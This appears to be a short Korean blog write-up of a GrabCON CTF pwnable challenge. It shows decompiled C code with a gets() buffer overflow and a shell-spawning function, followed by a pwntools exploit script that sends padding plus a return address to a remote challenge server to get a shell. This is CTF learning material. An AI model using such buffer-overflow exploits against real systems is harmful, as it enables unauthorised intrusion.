728x90
GrabCON CTF
이번 GrabCON에 참가하며 pwnable만 살짝 풀고 나왔다. 총 4문제가 있었는데 3문제밖에 못 풀어서 매우 슬프다 ㅠ
CODE
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[48]; // [rsp+0h] [rbp-30h] BYREF
gets(v4, argv, envp);
printf("well lets check if you can bypass me!!!");
return 0;
}
__int64 vuln()
{
execve("/bin/sh", 0LL, 0LL);
return 0LL;
}
너무나도 간단한 BOF문제인것 같습니다. 파일은 64BIT로 페이로드는 dummy[48] + sfp[8] + vlun 이 될것 같습니다.
소스코드
더보기
from pwn import *
p = remote('35.205.161.145', 49153)
vuln = p64(0x401146)
payload = b''
payload += b'A'*56 + vuln
p.sendline(payload)
p.interactive()
[해킹/시스템해킹] - [시스템해킹] Buffer Overflow(BOF)
728x90
'해킹 > 시스템해킹' 카테고리의 다른 글
[시스템해킹] HackCTF < Basic_BOF #1 > (0) | 2021.09.09 |
---|---|
[시스템해킹] GrabCON Pwn CTF? write up (0) | 2021.09.09 |
[시스템해킹] GrabCON can you? write up (0) | 2021.09.09 |
[시스템해킹] Buffer Overflow(BOF) (0) | 2021.09.09 |
[시스템해킹] HackCTF < Basic_BOF #1 > (0) | 2021.09.09 |